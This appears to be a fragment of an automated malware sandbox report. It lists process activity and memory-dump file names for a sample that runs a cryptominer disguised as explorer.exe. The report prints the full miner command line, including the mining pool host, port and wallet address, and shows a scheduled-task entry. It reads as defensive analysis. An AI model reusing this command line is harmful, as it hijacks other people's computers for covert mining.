C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {F6A35951-3F34-4AD4-B388-FDC9C458B64F} S-1-5-21-790309383-526510583-3802439154-1000:TVHJCWMH\Admin:Interactive:[1]1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/304-293-0x00000000FFB148A0-mapping.dmp
-
memory/392-419-0x00000000FFB148A0-mapping.dmp
-
memory/528-302-0x00000000FFB148A0-mapping.dmp
-
memory/532-194-0x00000000FFB148A0-mapping.dmp
-
memory/540-221-0x00000000FFB148A0-mapping.dmp
-
memory/548-266-0x00000000FFB148A0-mapping.dmp
-
memory/568-63-0x0000000000000000-mapping.dmp
-
memory/604-212-0x00000000FFB148A0-mapping.dmp
-
memory/648-383-0x00000000FFB148A0-mapping.dmp
-
memory/756-97-0x00000000FFB148A0-mapping.dmp
-
memory/840-203-0x00000000FFB148A0-mapping.dmp
-
memory/856-338-0x00000000FFB148A0-mapping.dmp
-
memory/884-133-0x00000000FFB148A0-mapping.dmp
-
memory/888-347-0x00000000FFB148A0-mapping.dmp
-
memory/940-374-0x00000000FFB148A0-mapping.dmp
-
memory/940-55-0x0000000000000000-mapping.dmp
-
memory/960-275-0x00000000FFB148A0-mapping.dmp
-
memory/1048-176-0x00000000FFB148A0-mapping.dmp
-
memory/1068-88-0x00000000FFB148A0-mapping.dmp
-
memory/1088-284-0x00000000FFB148A0-mapping.dmp
-
memory/1128-311-0x00000000FFB148A0-mapping.dmp
-
memory/1252-257-0x00000000FFB148A0-mapping.dmp
-
memory/1272-65-0x00000000FF330000-0x00000000FFB1C000-memory.dmpFilesize
7.9MB
-
memory/1272-67-0x00000000FF330000-0x00000000FFB1C000-memory.dmpFilesize
7.9MB
-
memory/1272-69-0x00000000FF330000-0x00000000FFB1C000-memory.dmpFilesize
7.9MB
-
memory/1272-64-0x00000000FF330000-0x00000000FFB1C000-memory.dmpFilesize
7.9MB
-
memory/1272-72-0x00000000FF330000-0x00000000FFB1C000-memory.dmpFilesize
7.9MB
-
memory/1272-71-0x00000000FF330000-0x00000000FFB1C000-memory.dmpFilesize
7.9MB
-
memory/1272-70-0x00000000FFB148A0-mapping.dmp
-
memory/1284-329-0x00000000FFB148A0-mapping.dmp
-
memory/1384-115-0x00000000FFB148A0-mapping.dmp
-
memory/1392-160-0x00000000FFB148A0-mapping.dmp
-
memory/1396-167-0x00000000FFB148A0-mapping.dmp
-
memory/1456-230-0x00000000FFB148A0-mapping.dmp
-
memory/1468-185-0x00000000FFB148A0-mapping.dmp
-
memory/1512-392-0x00000000FFB148A0-mapping.dmp
-
memory/1536-356-0x00000000FFB148A0-mapping.dmp
-
memory/1572-401-0x00000000FFB148A0-mapping.dmp
-
memory/1588-428-0x00000000FFB148A0-mapping.dmp
-
memory/1632-61-0x000000001B740000-0x000000001BA3F000-memory.dmpFilesize
3.0MB
-
memory/1632-62-0x00000000028BB000-0x00000000028DA000-memory.dmpFilesize
124KB
-
memory/1632-56-0x0000000000000000-mapping.dmp
-
memory/1632-60-0x00000000028B4000-0x00000000028B7000-memory.dmpFilesize
12KB
-
memory/1632-59-0x000007FEF2E20000-0x000007FEF397D000-memory.dmpFilesize
11.4MB
-
memory/1632-58-0x000007FEF3980000-0x000007FEF43A3000-memory.dmpFilesize
10.1MB
-
memory/1688-79-0x00000000FFB148A0-mapping.dmp
-
memory/1692-106-0x00000000FFB148A0-mapping.dmp
-
memory/1716-410-0x00000000FFB148A0-mapping.dmp
-
memory/1728-54-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmpFilesize
8KB
-
memory/1748-365-0x00000000FFB148A0-mapping.dmp
-
memory/1856-142-0x00000000FFB148A0-mapping.dmp
-
memory/1872-320-0x00000000FFB148A0-mapping.dmp
-
memory/1876-151-0x00000000FFB148A0-mapping.dmp
-
memory/1896-248-0x00000000FFB148A0-mapping.dmp
-
memory/1952-124-0x00000000FFB148A0-mapping.dmp
-
memory/2040-239-0x00000000FFB148A0-mapping.dmp